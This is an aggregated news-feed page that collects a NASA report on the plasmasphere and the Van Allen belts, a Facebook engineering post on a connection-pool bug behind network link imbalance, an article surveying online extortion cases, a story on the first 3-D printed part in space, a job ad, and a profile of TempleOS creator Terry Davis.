The radiation belts are not the only particle structures surrounding Earth. A giant cloud of relatively cool, charged particles called the plasmasphere fills the outermost region of Earth's atmosphere, beginning at about 600 miles up and extending partially into the outer Van Allen belt. The particles at the outer boundary of the plasmasphere cause particles in the outer radiation belt to scatter, removing them from the belt.

This scattering effect is fairly weak and might not be enough to keep the electrons at the boundary in place, except for a quirk of geometry: The radiation belt electrons move incredibly quickly, but not toward Earth. Instead, they move in giant loops around Earth. The Van Allen Probes data show that in the direction toward Earth, the most energetic electrons have very little motion at all – just a gentle, slow drift that occurs over the course of months. This is a movement so slow and weak that it can be rebuffed by the scattering caused by the plasmasphere.

This also helps explain why – under extreme conditions, when an especially strong solar wind or a giant solar eruption such as a coronal mass ejection sends clouds of material into near-Earth space – the electrons from the outer belt can be pushed into the usually-empty slot region between the belts.

"The scattering due to the plasmapause is strong enough to create a wall at the inner edge of the outer Van Allen Belt," said Baker. "But a strong solar wind event causes the plasmasphere boundary to move inward."

A massive inflow of matter from the sun can erode the outer plasmasphere, moving its boundaries inward and allowing electrons from the radiation belts the room to move further inward too.

The Johns Hopkins Applied Physics Laboratory in Laurel, Maryland, built and operates the Van Allen Probes for NASA's Science Mission Directorate. The mission is the second in NASA's Living With a Star program, managed by Goddard.

For more information about the Van Allen Probe, visit:

www.nasa.gov/vanallenprobes
 

[image-50] A cloud of cold, charged gas around Earth, called the plasmasphere and seen here in purple, interacts with the particles in Earth's radiation belts — shown in grey — to create an impenetrable barrier that blocks the fastest electrons from moving in closer to our planet. (Image Credit: NASA/Goddard)

[image-69] This animated gif shows how particles move through Earth's radiation belts, the large donuts around Earth. The sphere in the middle shows a cloud of colder material called the plasmasphere. New research shows that the plasmasphere helps keep fast electrons from the radiation belts away from Earth. (Image Credit: NASA/Goddard/Scientific Visualization Studio)

› Download this visualization

Kim Dotcom: “I'm broke” (German article)

14 hours 34 min ago

Virtual reality Jobs at Apple

14 hours 34 min ago

Solving the Mystery of Link Imbalance: A Metastable Failure State at Scale

14 hours 34 min ago

As we’re building and running systems at Facebook, sometimes we encounter metastable failure states. These are problems that create conditions that prevent their own solutions. In gridlocked traffic, for example, cars that are blocking an intersection keep traffic from moving, but they can’t exit the intersection because they are stuck in traffic. This kind of failure ends only when there is an external intervention like a reduction in load or a complete reboot.

This blog post is about code that caused a tricky metastable failure state in Facebook’s systems, one that defied explanation for more than two years. It is a great example of interesting things that happen only at scale, and how an open and cooperative engineering culture helps us solve hard problems.

Aggregated Links

Some packets inside a data center traverse several switches to get from one server to another. The switch-to-switch connections on these paths carry a lot of traffic, so these links are aggregated.

An aggregated link uses multiple network cables to carry traffic between the same source and destination. Each packet goes over only one cable, so the switches need a strategy for routing the packets. For TCP traffic, Facebook configures the switches to select the link based on a hash of source IP, source port, destination IP, and destination port. This keeps all the packets of a TCP stream on the same link, avoiding out-of-order delivery. There are lots of streams, so this routing scheme evenly balances the traffic between the links.
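
In rough pseudocode, the selection works something like the sketch below (a simplification; real switches use vendor-specific hash functions, not CRC32):

    import zlib

    NUM_LINKS = 4  # hypothetical size of the aggregated bundle

    def pick_link(src_ip, src_port, dst_ip, dst_port):
        # Hash the TCP 4-tuple so every packet of a flow uses the same
        # link, preserving in-order delivery within the stream.
        key = f"{src_ip}:{src_port}->{dst_ip}:{dst_port}".encode()
        return zlib.crc32(key) % NUM_LINKS

    print(pick_link("10.0.0.1", 40123, "10.0.1.9", 3306))

Because each new connection gets an effectively random source port, the flows should land on the links uniformly.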

Except when it doesn’t.

The reality is that sometimes most of the active TCP connections would be hashed to a single link. That link would be overloaded and drop packets. Even worse, this failure state was metastable. Once an imbalanced link became overloaded, the rest of the links would remain uselessly idle until traffic was drained or the hash algorithm was changed.

For two years, we tackled this problem at the switch level. We worked with our vendors to detect imbalance and rapidly rotate the hash function’s seed when it occurred. This kept the problem manageable. As our systems grew, however, this auto-remediation system stopped working as well. Often, when we would drain an imbalanced link the problem would just move to another one. It was clear that we needed to understand the root cause.

The Clue

The link imbalance occurred on multiple vendors’ switch and router hardware. It had multiple triggers: Sometimes the trigger was transient network congestion, such as a large bulk transfer; sometimes it was hardware failure; and sometimes it was a load spike in database queries. It wasn’t confined to a particular data center. We suspected that it was a metastable state because it would outlast the trigger, but because there were lots of patterns, it was difficult to separate cause and effect.

We did find one robust clue: The imbalanced links always carried traffic between MySQL databases and the cache servers for TAO, our graph store for the social graph.

It seemed likely that TAO's behavior was causing the imbalance, but we had no plausible mechanism. The hash algorithm, source IP, destination IP, and destination port didn't change during the onset of the problem; the source port was the only variable factor. This implies that the switch wasn't at fault, because the route is predetermined before the switch gets the SYN packet. On the other hand, the TAO server couldn't be at fault either, because its choice of source port is pseudo-random and blind. Even if the server were aware that the links were aggregated – and it isn't – it doesn't know the hash algorithm or hash seed, so it can't choose a particular route.

Lots of eyes looked at the code involved, and it all seemed correct. We weren’t using any non-standard switch settings or weird kernel settings. The code was ordinary and hadn’t had any significant changes since a year before the link imbalance bug first surfaced. We were stumped.

Collaboration and Collusion

Facebook’s culture of collaboration proved key. Each layer of the system seemed to be working correctly, so it would have been easy for each team to take entrenched positions and blame each other. Instead, we decided that a cross-layer problem would require a cross-layer investigation. We started an internal Facebook group with some network engineers, TAO engineers, and MySQL engineers, and began to look beyond each layer’s public abstractions.

The breakthrough came when we started thinking about the components in the system as malicious actors colluding via covert channels. The switches are the only actors with knowledge of how packets are routed, but TAO is the only actor that can choose a route. Somehow the switches and TAO must be communicating, possibly with the aid of MySQL.

If you were a malicious agent inside the switch, how would you secrete information to your counterparty inside the TAO application? Most of the covert channels out of the switch don’t make it through Linux’s TCP/IP stack, but latency does – and that was our light-bulb moment. A congested link causes a standing queue delay, which embeds information about the packet routing in the MySQL query latency. Our MySQL queries are very fast, so it is easy to look at the query execution times and tell if it went across a congested link. Even a congestion delay of 2 milliseconds is clearly visible with application-level timers.

The receiving end of the collusion must be in code that manages connections, and that has access to timing information about the queries. TAO’s SQL connection pool seemed suspect. Connections are removed from the pool for the duration of a single query, so careful bookkeeping by a malicious agent inside the pool could record timings. Since the timing information gives you a good guess as to whether a particular connection is routed over a congested link, you could use this information to selectively close all of the other connections. Even though new connections are randomly distributed, after a while only the congested links would be left. But who would code such a malicious agent?

Unintended Consequences in a Custom MySQL Connection Pool

Surprisingly, the code for the receiving agent was present in the first version of TAO. We implemented an auto-sizing connection pool by combining a most recently used (MRU) reuse policy with an idle timeout of 10 seconds. This means that at any moment, we have as many connections open as the peak number of concurrent queries over the previous 10 seconds. Assuming that query arrivals aren’t correlated, this minimizes the number of unused connections while keeping the pool hit rate high. As you’ve probably guessed from the word “assuming,” query arrivals are not uncorrelated.
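
A minimal sketch of that original policy follows; this is not our production code, just the shape of it:

    import time

    IDLE_TIMEOUT_S = 10.0

    def open_new_connection():
        # Stand-in for establishing a real MySQL connection.
        return object()

    class MRUPool:
        def __init__(self):
            self.stack = []  # (connection, time_returned); top = most recent

        def get(self):
            now = time.monotonic()
            # Expire connections idle longer than the timeout.
            self.stack = [(c, t) for c, t in self.stack
                          if now - t < IDLE_TIMEOUT_S]
            if self.stack:
                return self.stack.pop()[0]  # reuse the most recently returned
            return open_new_connection()

        def put(self, conn):
            # Whichever query finished *last* lands on top of the stack;
            # this is the deck-stacking described below.
            self.stack.append((conn, time.monotonic()))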

Facebook collocates many of a user’s nodes and edges in the social graph. That means that when somebody logs in after a while and their data isn’t in the cache, we might suddenly perform 50 or 100 database queries to a single database to load their data. This starts a race among those queries. The queries that go over a congested link will lose the race reliably, even if only by a few milliseconds. That loss makes them the most recently used when they are put back in the pool. The effect is that during a query burst we stack the deck against ourselves, putting all of the congested connections at the top of the deck.

No individual cache server can overload a link, but the deck-stacking story plays out simultaneously on hundreds of machines. The net effect is that the TAO system continually probes all of the links between it and the databases, and if it finds a slow link it will rapidly shift a large amount of traffic toward it.

This mechanism explains the multitude of causes and the robustness of the effect. The link imbalance bug doesn’t create congestion but makes it metastable. After some other problem causes a link to saturate, the connection pool shifts traffic in a way that keeps the link saturated even when the original trigger is removed. The effect is so strong that the time lag between changing a switch’s hash and draining its outbound queue can allow the problem to reoccur with a new set of connections.

Simple Fix

The fix is very simple: We switched to a least recently used (LRU) connection pool with a maximum connection age. This uses slightly more connections to the database, but the databases can easily handle the increase.
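
In sketch form, the change is tiny (again, illustrative Python rather than the production code; the 300-second age cap is a made-up number):

    import collections
    import time

    MAX_AGE_S = 300.0  # hypothetical maximum connection age

    def open_new_connection():
        # Stand-in for a real MySQL connection, tagged with creation time.
        return {"born": time.monotonic()}

    class LRUPool:
        def __init__(self):
            self.queue = collections.deque()  # oldest-returned at the left

        def get(self):
            now = time.monotonic()
            while self.queue:
                conn = self.queue.popleft()  # least recently used first
                if now - conn["born"] < MAX_AGE_S:
                    return conn
                # Past the age cap: discard it and keep looking.
            return open_new_connection()

        def put(self, conn):
            # Finish order no longer drives reuse order, so a congested
            # connection can't keep itself at the front of the line.
            self.queue.append(conn)

Cycling through the least recently used connection means the pool keeps sampling all of the links instead of locking onto the slow one.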

We wanted to be completely sure we had resolved the problem, so we took the extra step of manually triggering it a few times. When we fixed the connection pool, we included a command that would let us switch between the old and new behavior at runtime. We set the policy to MRU, and we manually caused a congested link. Each time, we watched the imbalance disappear within seconds of enabling the LRU policy. Then, we tried unsuccessfully to trigger the bug with LRU selected. Case closed.

But how would this impact Facebook's new fabric network? Facebook’s newest data center in Altoona, Iowa, uses an innovative network fabric that reduces our reliance on large switches and aggregated links, but we still need to be careful about balance. The fabric computes a hash to select among the many paths that a packet might take, just like the hash that selects among a bundle of aggregated links. The path selection is stable, so the link imbalance bug would have become a path imbalance bug if we hadn’t fixed it.

Lessons Learned

The most literal conclusion to draw from this story is that MRU connection pools shouldn’t be used for connections that traverse aggregated links. At a meta-level, the next time you are debugging emergent behavior, you might try thinking of the components as agents colluding via covert channels. At an organizational level, this investigation is a great example of why we say that nothing at Facebook is somebody else’s problem.

Thanks to all of the engineers who helped us manage and then fix this bug, including James Paussa, Ernesto Ovcharenko, Mark Drayton, Peter Hoose, Ankur Agrawal, Alexey Andreyev, Billy Choe, Brendan Cleary, JJ Crawford, Rodrigo Curado, Tim Eberhard, Kevin Federation, Hans Fugal, Mayuresh Gaitonde, CJ Infantino, Mark Marchukov, Chinmay Mehta, Murat Mugan, Austin Myzk, Gaya Nagarajan, Dmitri Petrov, Marco Rizzi, Rafael Rodriguez, Steve Shaw, Adam Simpkins, David Swafford, Wendy Tobagus, Thomas Tobin, TJ Trask, Diego Veca, Kaushik Veeraraghavan, Callahan Warlick, Jason Wilbanks, Jimmy Williams, and Keith Wright.

The Increasing Trend of Online Extortion

14 hours 34 min ago

I heard about this guy, walked into a federal bank with a portable phone, handed the phone to the teller, the guy on the other end of the phone said: “We got this guy’s little girl, and if you don’t give him all your money, we’re gonna kill ‘er.”

Did it work?

F**kin’ A it worked, that’s what I’m talkin’ about! Knucklehead walks in a bank with a telephone, not a pistol, not a shotgun, but a f**kin’ phone, cleans the place out, and they don’t lift a f**kin’ finger.

Did they hurt the little girl?

I don’t know. There probably never was a little girl — the point of the story isn’t the little girl. The point of the story is they robbed the bank with a telephone.

This is out of the opening scene of Pulp Fiction and clearly, it’s fictitious. Except for when it isn’t:

Brian Krebs reported on this a few months ago and it's about as brazen as you'd expect online criminals to get: give us money or we'll mess up your stuff. It's the mob protection racket of the digital era, only more random, with less chance of getting caught and not as many gold necklaces (I assume). One bitcoin is about $400 US today – enough for a tidy little return, but not so much that it makes for an unachievable ransom for most small businesses.

The worrying thing is though, this is just part of a larger trend that’s drawing online criminals into the very lucrative world of extortion and we’re seeing many new precedents in all sorts of different areas of the online world. Let me show you what I mean.

Destroying a business via the web

Let's say you have a hankering for a plate of lion meat one day (you heard me), so you do a Google search and find the perfect restaurant – but it's shut on weekends. Bugger. So you go somewhere else, as do all the other exotic food hunters looking for the king of the jungle with a side of fries. This was the fate the Serbian Crown restaurant in the US met earlier this year (that's a web archive link; do make sure your sound is turned way up to enjoy the full experience):

You see, some enterprising soul had decided to take the initiative of creating a Google Places entry for the joint and misrepresented their operating hours:

It turned out that Google Places, the search giant’s vast business directory, was misreporting the Serbian Crown’s hours. Anyone Googling Serbian Crown, or plugging it into Google Maps, was told incorrectly that the restaurant was closed on the weekends

The point of all this is that when it comes to letters of extortion, attackers can actually be quite effective in carrying out their threats. They can destroy businesses to the extent that a Bitcoin or two to keep the business alive suddenly doesn't seem like such a bad deal, and that's enormously worrying. But the spate of extortion we've seen this year goes well beyond mere threats to damage the victim's business; increasingly, the attacker already owns the target and now they're talking ransom.

Corporate espionage and ransom

I’ve actually had this blog post in draft for a little while, adding pieces to it as new events occurred. The catalyst for completing it was this one:

This was allegedly “on every computer all over Sony Pictures nationwide” today. The referenced zip file contains a couple of hundred meg of text files with file listings that look legit. If you take this at face value (and given they’ve demonstrated they had control of a number of Sony Pictures Twitter accounts that’s the safe assumption to make), that’s a huge amount of sensitive data they’re sitting on. Here’s just a snippet of what I found this morning:

It’s not clear what #GOP has demanded from Sony but what is clear is that they potentially have hold of a whole heap of very sensitive data there. At the time of writing, their deadline was going on half a day ago and there was still no mass release of data to the public so clearly it was an empty threat, right? Or did Sony pay up? Does anyone pay up? Apparently yes.

An extortion success story: Nokia

Earlier this year there was a report that in 2007, Nokia paid an extortionist “several million euros” for some encryption keys.  Holy crap does this business pay! Sometimes.

The problem in a case like this is that paying the extortion made good financial sense to Nokia. Had someone started to exploit those keys to sign packages which could then be installed on their devices under Nokia's identity, they could have taken a massive hit on consumer confidence at a time when they were just starting to lose serious market share.

Think extortionists are just targeting corporate entities? Think again: everyday consumers are getting hit too.

The mechanics of the iCloud “hack” and how iOS devices are being held to ransom

It's not just the big guys getting hit with ransoms; everyday consumers are getting pinged by attackers too. Back in May I wrote about this:

This especially hit unsuspecting Aussies for reasons which weren't apparent at the time, but which later turned out to be the result of phishing pages with a penchant for targeting those of us down under. Whilst this was often reported as being malware, there was no "ware" to it; rather, it was a case of the attacker simply using the "Find My iPhone" feature to remotely lock the device and, where no lock screen PIN existed, set one of their own. You got the PIN once you paid the cash. It was ingeniously simple.

Of course consumers have been hit with ransoms before, CryptoLocker is a perfect example of this. You get malware via one of the usual means, all your things get encrypted and then the attacker demands money to release the private key to you. That’s another one that has been quite effective down here with a particularly high profile case of a doctor’s surgery being hit a couple of years back.

A seemingly endless stream of ransoms

Ransoms seem to be really hitting their straps as of late. Beyond all the cases above, there are incidents like Dominos in France back in June with the hackers demanding €30,000 and speculation rife both about it having been paid and rejected. Probably only Dominos and the attackers know for sure.

The month after that it was the European central bank getting hacked and allegedly threatened by an extortionist.

A month later again and Android phones are accusing people of liking their pets just a little bit too much and demanding cash lest you be reported to the FBI who are apparently interested in such things.

Just last week it was the city of Detroit getting owned with attackers wanting a couple of thousand Bitcoins for their troubles. Detroit of all places! Aren’t they the ones in financial dire straits?!

Ransoms will increase because they make good sense

Think about it: you don't have to come face to face with anyone as in the extortion rackets of old; you can run the whole gig from your office / bedroom / dungeon; there's more and more connected stuff with more and more vulnerabilities; we're both personally and professionally more dependent than ever on online services; and best of all, we've got easy access to cryptocurrency for when victims pay up!

Actually, it's even better than that (for the attackers at least), because it makes good financial sense for victims to pay: in many cases the attackers have done a damn good job. That's not an endorsement of the ethics of the whole thing, rather an observation that in many of these cases, they've left the victim with little choice: pay or be seriously inconvenienced. They're making the return on investment too attractive to say "no", and that's an extremely worrying trend.

It’s even better than walking into the bank with a phone, these days you just send an anonymous email.

The First 3-D Printer in Space Makes Its First Object: A Spare Part

14 hours 34 min ago

After a series of calibration tests, the first 3-D printer to fly to outer space has manufactured its first potentially useful object on the International Space Station: a replacement faceplate for its print head casing.

"An astronaut might be installing it on the printer," said Aaron Kemmer, the chief executive officer of Made In Space, which built the 3-D printer for NASA's use.

The 9.5-inch-wide contraption was delivered to the space station by a robotic SpaceX Dragon cargo ship in September, and NASA astronaut Butch Wilmore set it up inside the station's experimental glovebox a week ago.

NASA via Made In Space

NASA astronaut Butch Wilmore, the International Space Station's commander, holds up the first 3-D-printed part made in space. It's a replacement print head faceplate, which holds internal wiring in place within the 3-D printer's extruder. The faceplate, which bears the logos for Made in Space and NASA, measures roughly 3 by 1.5 inches (7.6 by 3.8 centimeters) with a thickness of a quarter-inch (6 millimeters).

Since then, the crew has been printing out plastic test patterns, or "coupons," to check how the machine works in zero gravity. "Everything worked exactly as planned, maybe a little better than planned," Kemmer told NBC News. He said only two calibration passes were needed in advance of the first honest-to-goodness print job, which finished up at 4:28 p.m. ET Monday and was pulled out of the box early Tuesday.

"It's not only the first part printed in space, it's really the first object truly manufactured off planet Earth," Kemmer said. "Where there was not an object before, we essentially 'teleported' an object by sending the bits and having it made on the printer. It's a big milestone, not only for NASA and Made In Space, but for humanity as a whole."

Made In Space's 3-D printer is similar to the earthly variety: A thin filament of ABS plastic is fed through the machine, melted and then extruded through the print head to build up the desired object, layer by thin layer. Over the course of hours, the printer's computer program controls precisely where the squirts of plastic are directed.

On Earth, 3-D printers can make toys and tchotchkes, or plastic pistols and prosthetics. In space, astronauts may someday count on 3-D printers to make tools or spare parts from standard-issue feedstock, rather than having to rely on a stockpile of hardware flown up from Earth at a cost of $10,000 a pound. That capability will be particularly important for trips to Mars — because in deep space, no one can point you to a hardware store.

However, the space environment poses challenges for 3-D printing technology. Does the machine work in weightlessness the way it does in Earth's gravity? Can the plastic be built up into predictable structures? How easy is it to remove the finished part?

NASA reported that the replacement faceplate adhered more strongly to the machine's print tray than anticipated, "which could mean layer bonding is different in microgravity, a question the team will investigate as future parts are printed."

Niki Werkheiser, program manager for the project at NASA's Marshall Space Flight Center, said she and her colleagues are learning a lot, even from the first print.

"As we print more parts we’ll be able to learn whether some of the effects we are seeing are caused by microgravity or just part of the normal fine-tuning process for printing," Werkheiser said in a NASA news release. "When we get the parts back on Earth, we’ll be able to do a more detailed analysis to find out how they compare to parts printed on Earth.”

This 3-D printer is primarily a demonstration project. Over the next few months, a variety of items will be printed out in space, including an object designed under the auspices of a contest for students. The lessons learned will be factored into the design of a fuller-featured printer to be sent to the station sometime in the next year or so.

"You can imagine something like the Wright Brothers flight," Kemmer said. "They learned a lot when they flew that first time, then they iterated their design. That's where we're at, in the learning and iterating phase."

Eventually, digital blueprints for printed objects will be customized on Earth, then beamed up to the station for production. Made In Space is also working on a recycling device. "That will close the loop completely," Kemmer said. "You take the [plastic] trash, throw it into a recycler, turn it into feedstock, and print with the recycled feedstock. And when you're done with the part, you can recycle it again."

So will the print head part that was created today someday become the feedstock for another item printed out in space? Not a chance. NASA plans to send the part back down to Earth for analysis — and if Kemmer has anything to say about it, the first object made in space will eventually wind up in a museum.

First published November 25 2014, 12:15 PM

Teespring (YC W13) Is Looking for Senior UI/Front-end Engineers

14 hours 34 min ago
Overview: Teespring, an innovative web-based crowdfunding platform and tech startup, is seeking a Sr. UI/Front-End Engineer for its San Francisco office. A graduate of Y Combinator's Winter 2013 class, Teespring launched in 2011 and has helped its users sell over 2 million shirts to date. We are hunting for engineers to work on problems that contribute directly to our two main goals: growing the company and making our users happy. We are among the fastest-growing new companies in the country and are always on the lookout for engineering talent to help sustain our growth and product.

Description: We are looking for a Sr. UI Engineer with extensive experience in object-oriented JavaScript, HTML5, and CSS3. You will be responsible for building out our next-generation mobile applications. We encourage innovation, creativity, and a think-outside-the-box attitude when solving complex problems and implementing new solutions. You should have a strong passion for design and product development, along with solid communication skills, as you will be interacting with all teams – in particular the product and creative teams.

The front-end engineer will help us push the boundaries of what is possible. You'll work side by side with outstanding designers. You should be proficient in HTML, CSS and JavaScript. You should appreciate the details that make a front-end user experience memorable, and demonstrate enthusiasm for new front-end technologies.

We offer a highly competitive benefits package including base salary, full benefits, annual and spot bonuses, and a great work environment.

What the UI Engineer will need:
- 5+ years of experience as a Software Engineer with a focus on UI, and a firm understanding of front-end best practices
- Expert experience with object-oriented JavaScript and frameworks such as Backbone.js, Node.js, Knockout, AngularJS, batman.js, Closure
- Experience with HTML5, CSS3, SASS (we use SCSS) and jQuery, as well as comfort writing native JavaScript
- Proficiency with Adobe Creative Suite (mainly Photoshop)
- Ability to own and execute complex projects
- Bachelor's Degree in Computer Science or equivalent work experience (required)

Nice to have as a UI engineer:
- High-traffic social network, gaming or web experience
- Experience with Agile/Scrum
- Experience with front-end performance testing and optimization
- Experience working with Rails and Grunt/Gulp
- Experience with OOCSS
- Experience with HAML/Slim templating engines
- Experience with JavaScript testing frameworks like Jasmine, Mocha or QUnit

What's in it for the UI Engineer:
- Competitive base salary
- Relaxed work environment (kegerator, ping-pong table, lounge areas)
- Flexible work schedule
- Company-sponsored events

Email resume to ashley.hearn@teespring.com to learn more

God's Lonely Programmer

25 November 2014 - 8:00pm

In the beginning there is darkness. The screen erupts in blue, then a cascade of thick, white hexadecimal numbers and cracked language, "UnusedStk" and "AllocMem." Black screen cedes to blue to white and a pair of scales appear, crossed by a sword, both images drawn in the jagged, bitmapped graphics of Windows 1.0-era clip-art—light grey and yellow on a background of light cyan. Blue text proclaims, "God on tap!"

This is TempleOS V2.17, the welcome screen explains, a "Public Domain Operating System" produced by Trivial Solutions of Las Vegas, Nevada. It greets the user with a riot of 16-color, scrolling, blinking text; depending on your frame of reference, it might recall DESQview, the Commodore 64, or a host of early DOS-based graphical user interfaces. In style if not in specifics, it evokes a particular era, a time when the then-new concept of "personal computing" necessarily meant programming and tinkering and breaking things.

Gif by the author

It’s all innocuously familiar. You see a sprite-based first person shooter called Castle Frankenstein and a dollar-bill icon that opens a budgeting application. Vocab is a multiple-choice quiz (can you define "folliculous"?). A Battlezone homage opens with the admonishment, "Write games, don’t play them!"

Then there are less mundane features. Pressing F7 anywhere in TempleOS summons a pseudo-random "tongues word." Five F7s at the command prompt might produce downmarket Dada like "flashedt ARE evil madly peacemaker." Shift-F7 inserts a Bible passage. (Or, less revelatory, the copyright notice from Project Gutenberg's e-text Bible.) Jukebox offers a collection of PC-speaker tunes with Biblically inspired lyrics, like this gloss on Mark 4:37: Lord, there's a storm upon the sea / Lord, there's a storm upon the sea / Relax, fellas / (Sea became glass).

TempleOS is more than an exercise in retro computing, or a hobbyist’s space for programming close to the bare metal. It’s the brainchild—perhaps the life’s work—of 44-year-old Terry Davis, the founder and sole employee of Trivial Solutions. For more than a decade Davis has worked on it; today, TempleOS is 121,176 lines of code, which puts it on par with Photoshop 1.0. (By comparison, Windows 7, a full-fledged modern operating system designed to be everything to everyone, filled with decades of cruft, is ​about 40 million lines.)

He's done this work because God told him to. According to the TempleOS charter, it is "God's official temple. Just like Solomon's temple, this is a community focal point where offerings are made and God's oracle is consulted." God also told Davis that 640x480, 16-color graphics "is a covenant like circumcision," making it easier for children to make drawings for God. God demands a perfect temple, and Davis says, "For ten years, I worked on programming TempleOS, full time. I finished, basically, and the last year has been tiny touch-ups here and there."

Within TempleOS he built an oracle called AfterEgypt, which lets users climb Mt. Horeb along with a stick-figure Moses. At the summit, a round scrawl of rapidly changing color comes into sight—the burning bush. Before it you should praise God. You can praise Him for anything, Davis says, including sand castles, snowmen, popcorn, bubbles, isotopes, and sand crabs.

"The Holy Spirit can puppet you," the screen reads. When you press the spacebar, an onscreen timer stops, and a corresponding Biblical passage appears. "Sometimes interpretation is tricky," Davis says in ​one of his many YouTube demonstrations. He describes this AfterEgypt oracle as a technical improvement on speaking in tongues or using a Ouija board, and points to 1 Corinthians 14:2: "For one who speaks in a tongue does not speak to men but to God; for no one understands, but in his spirit he speaks mysteries."

Davis hasn't hesitated to speak to the world about God's digital temple. Back in 2004, he was calling it the J Operating System, and OSNews profiled his work. He later renamed it LoseThos—a somewhat murky reference to a scene in Platoon—and had a productive conversation with the contributors at MetaFilter, where his work was introduced as "an operating system written by a schizophrenic programmer."

He has been diagnosed with schizophrenia, having dealt with mental health issues since the mid-1990s. Because Davis often communicates in blocks of text produced by his oracle, or with apparently off-topic declarations about God, he's had accounts banned from SomethingAwful and Reddit. He can be aggressive and confrontational, sometimes denouncing critics with profanity and calling them "nigger."

This has gotten him "shadowbanned" on Hacker News, meaning he's visible only to users who've explicitly chosen to see his "dead" posts, and has led to a lengthy discussion about how to manage a fellow message board member's mental illness. MetaFilter and Reddit have had similarly touching, frustrating conversations among people grappling with basic questions of empathy and community.

But none of this is the recognition Davis is looking for in building God’s temple. "It's nice when getting attention," he says, "but now I know what it's like." It rarely means more people using TempleOS to talk to God.

So, what compelled him to build a 16-color world in worship? I wanted to understand, as best I could, how he’s spent a decade as God’s lonely programmer, a voice in the wilderness shouting the good news.

<="" em="">

He drinks a lot of caffeine and lives mostly on a 48-hour schedule

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

Davis emails me regularly and late into the night, in Courier font, from a two- or three-year-old Dell desktop running Ubuntu. Unable to work, he collects Social Security disability and spends most of his time coding, web surfing, or using the output from the National Institute of Standards and Technology randomness beacon to talk to God—he posts the results on his webpage as "Terry Davis' Rants."

He drinks a lot of caffeine and lives mostly on a 48-hour schedule: "I stay awake 16*2 and sleep 8*2." He shares a house with his parents and a pair of cockatiels. Of his parents he says, "We don't interact that much."

Terry Davis was born in December 1969, in West Allis, Wisconsin, just west of Milwaukee, the seventh of eight children. His brothers and sisters were close, but about his relationship with them today he says, "Jesus did not talk to his siblings—he wanted nothing to do with them, strangers are better. I am the same way."

His dad was an industrial engineer, and the family moved a lot while Davis was growing up, from Wisconsin to Washington to Michigan to California to Arizona. In an elementary school gifted program, he started using an Apple II; in the early 1980s, he learned assembly language on a Commodore 64, then continued programming throughout high school. Then he enrolled at Arizona State University, where he earned his bachelor’s degree, then a master’s in electrical engineering in 1994.

After graduation he stayed in Tempe, Arizona, partly because he had a job. As an undergrad he’d been hired at Ticketmaster to program operating systems. He liked the work, but when the company shifted him to research projects that never seemed to pan out, he decided it was time to look elsewhere. He was 26, had a master’s degree, and he wanted to use that knowledge to build satellite control systems. In early 1996 he sent out some resumes to defense contractors.

He’d grown up Catholic, but later embraced atheism. "I thought the brain was a computer," Davis says, "And so I had no need for a soul." He saw himself as a scientific materialist; he believes that metaphor—the brain as a computer—has done more to increase the number of atheists than anything by Darwin. He still considers himself scientifically minded. "Today I find the people most similar to me are atheist-scientist people," he says. "The difference is God has talked to me, so I'm basically like an atheist who God has talked to."

Davis describes how that happened in a fragmentary, elliptical way, perhaps because it was such a profoundly subjective experience, or maybe because it still embarrasses him. "It’s not very flattering," he says. "It looks a lot like mental illness, as opposed to some glorious revelation from God." It was a period of tribulation, but to this day he declares, "I was being led along the path by God. It just doesn’t look very glorious."

In mid-March 1996, "I started seeing people following me around in suits and stuff. It just seemed something was strange," he says. He thought it might be part of a background check by one of his prospective employers, but it unnerved him. He began connecting it to a side project he'd worked on involving computer control systems. And he'd been listening to Rage Against the Machine; the line, "Some of those work forces are the same that burn crosses" stuck with him for reasons unknown.

He got thinking about conspiracy theories and the men he’d seen following him and a big idea he’d had. He spooked himself. "It would sound polite if you said I scared myself thinking about quantum computers," he says now. "And then I guess you just throw in your ordinary mental illness."

He left town. Driving south with no clear destination, he says, "I was listening to the radio and it seemed like the radio was talking to me." It spouted commentary on everything he did. He believed the end of the world was at hand. His head swam with conspiracy theories and apocalyptic foreboding.

<="" em=""> <="" em="">

<="" em=""> Gif by the author

He ended up in Marfa, Texas, where he abandoned his car—a Honda Accord his parents had given him. He’d started thinking about Big Oil and the conspiracies alleged to have suppressed more efficient, water-based engines. He’d torn off all the side panels from his car looking for a tracking device, then stopped the car and pitched the keys into the desert. He walked. A cop pulled up and ushered him into the passenger’s seat. Moments later, Davis dove out of the cruiser, breaking his collarbone.

At the hospital, he overheard doctors talking about "artifacts" on his X-ray scans. Panicked at the thought of artifacts supposedly left inside by alien abductors, he bolted from the hospital, despite the broken collarbone. When he tried to steal a pickup truck idling nearby, the police caught up with him. In jail, he reasoned that he could open his cell door by flipping the circuit breaker; he broke his glasses and stuck them into the cell’s electrical outlet, only to realize he had non-conductive frames. The police rushed in. "I think I stripped," Davis says, "because I was thinking of corporate logos being bad or something."

He was taken to a mental hospital, where he refused to eat the food, thinking it might be drugged. He broke a window with a chair. Released after two weeks, he sought to emulate Jesus by giving away all his belongings; he donated to Goodwill, and delivered presents to his siblings’ children. He may have crossed into Mexico at some point, then had to bribe his way back across the border. He just drove, looking to street signs to divine God’s will. Later he lived on the streets.

"In the Bible it says if you seek God, He will be found of you," Davis says now. "I was really seeking, and I was looking everywhere to see what he might be saying to me."

"Looking back on it, I’m not especially proud of the logic and thinking. It looks very young and childish and pathetic," Davis adds. He compares the experience to having a flip switched, one that revealed his deepest conscience and morality. "I felt guilty for being such a technology-advocate atheist," he says. He thought of the Amish and Little House on the Prairie—simple, decent ways of living with God.

In one of his rants, he writes, "In 1996, I off-handedly decided to give a few dollars to charity for the blind. I was an atheist from 1990-1996 and gave nothing to charity. Perhaps, that act caused God to reveal Himself to me and saved me." He estimates he gave about $10,000 to the Newman Center, Arizona State’s campus ministry.

By July of 1996, his mental state had calmed enough that he returned to Arizona. For the next year he lived on credit cards, trying to make a business out of a three-axis milling machine he'd prototyped. (It was obvious to him that 3D printing would be the next big thing, but it was also painfully slow.) After an errant Dremel tool nearly set his apartment on fire, he abandoned the idea.

Eventually he moved in with his parents in Vegas, hoping to save money while he worked on a book, a sequel to George Orwell’s 1984. He didn’t finish it.

"From 1996 to 2003, about every six months I would have what they call a manic episode and I would end up in a mental hospital," he says. He hasn’t been to a hospital since; once diagnosed as bipolar, he’s since been declared schizophrenic. He now only takes a single medication, and shrugs off the diagnosis. The label doesn’t concern him. "For those first few years, I was genuinely pretty crazy in a way. Now I'm not. I'm crazy in a different way maybe," he says. He says he’s learned not to freak out.

